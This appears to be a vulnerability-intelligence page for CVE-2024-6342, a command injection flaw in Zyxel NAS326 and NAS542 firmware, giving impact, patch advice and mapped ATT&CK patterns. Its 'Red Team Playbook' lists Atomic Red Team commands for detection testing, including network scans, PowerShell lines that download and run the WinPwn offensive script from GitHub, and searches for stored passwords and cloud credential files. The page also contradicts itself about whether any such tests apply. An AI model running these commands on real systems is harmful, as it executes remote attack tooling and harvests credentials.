CVE-2024-6342
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the export-cgi program of Zyxel NAS326 and NAS542 firmware. The affected component fails to sanitize user-supplied data in HTTP POST requests, allowing execution of arbitrary operating system commands. The flaw exists in firmware versions up to and including V5.21(AAZF.18)C0 for NAS326 and V5.21(ABAG.15)C0 for NAS542 devices.
Vulnerability Description
**UNSUPPORTED WHEN ASSIGNED** A command injection vulnerability in the export-cgi program of Zyxel NAS326 firmware versions through V5.21(AAZF.18)C0 and NAS542 firmware versions through V5.21(ABAG.15)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
Impact
An unauthenticated remote attacker can execute arbitrary operating system commands on affected Zyxel NAS devices by exploiting this vulnerability via network access, without requiring user interaction or credentials. This can lead to full system compromise, including data theft, device manipulation, or disruption of services. The CVSS vector indicates no privileges or user interaction are needed (AV:N/AC:L/PR:N/UI:N), emphasizing the high severity and ease of exploitation.
Solution
Zyxel has released firmware updates addressing this vulnerability in NAS326 and NAS542 models. Users should upgrade to firmware versions later than V5.21(AAZF.18)C0 for NAS326 and V5.21(ABAG.15)C0 for NAS542. Detailed patch instructions and advisory information are available in Zyxel's security advisory published on 09-10-2024 at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-nas-products-09-10-2024. Applying these updates is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability present in the export-cgi program of specific Zyxel NAS firmware versions poses a significant security risk. This flaw allows an unauthenticated attacker to execute arbitrary operating system commands by crafting a malicious HTTP POST request. The vulnerability arises from insufficient input validation, enabling attackers to manipulate the command execution flow. By exploiting this weakness, an attacker can gain unauthorized access to the underlying operating system, potentially leading to a complete compromise of the device.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could deploy automated scripts to send specially crafted HTTP POST requests to the affected NAS devices, targeting the export-cgi program. Given that the vulnerability does not require authentication, it becomes particularly dangerous, as it allows attackers to target devices indiscriminately over the internet. Scenarios may include gaining access to sensitive data stored on the NAS, executing commands to alter device configurations, or even launching further attacks within the network. The ease of exploitation and the potential for remote access make this vulnerability a prime target for malicious actors.
The real-world impact of this vulnerability is profound, especially for businesses relying on Zyxel NAS devices for data storage and management. A successful attack could lead to data breaches, loss of sensitive information, and disruption of business operations. The financial implications could be severe, including costs associated with incident response, legal liabilities, and reputational damage. Furthermore, the compromised devices could be used as a foothold for lateral movement within the network, increasing the overall risk to the organization. Given the high CVSS score of 9.8, the urgency for remediation is clear, as the potential consequences of exploitation can be catastrophic.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Network monitoring tools can be employed to detect unusual traffic patterns or unauthorized access attempts, providing early warning signs of potential exploitation. Additionally, organizations should consider implementing firewalls and intrusion detection systems to limit exposure to the internet and block malicious requests. Educating employees about the risks associated with unsecured devices and promoting best practices for device management can further enhance security posture.
In conclusion, the command injection vulnerability in Zyxel NAS firmware represents a critical threat that requires immediate attention. The combination of ease of exploitation, potential for significant impact, and the necessity for proactive detection and mitigation strategies underscores the importance of addressing this issue. Organizations must prioritize securing their devices to protect against unauthorized access and safeguard sensitive data from malicious actors. By taking a comprehensive approach to vulnerability management, businesses can reduce their risk and enhance their overall cybersecurity resilience.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Nas326 Firmware | All |
cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Nas326 Firmware | 5.21\(aazf.18\)c0 |
cpe:2.3:o:zyxel:nas326_firmware:5.21\(aazf.18\)c0:-:*:*:*:*:*:*
|
|
|
Zyxel | Nas542 Firmware | All |
cpe:2.3:o:zyxel:nas542_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Nas542 Firmware | 5.21\(abag.15\)c0 |
cpe:2.3:o:zyxel:nas542_firmware:5.21\(abag.15\)c0:-:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6342 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in-nas-products-09-10-2024 |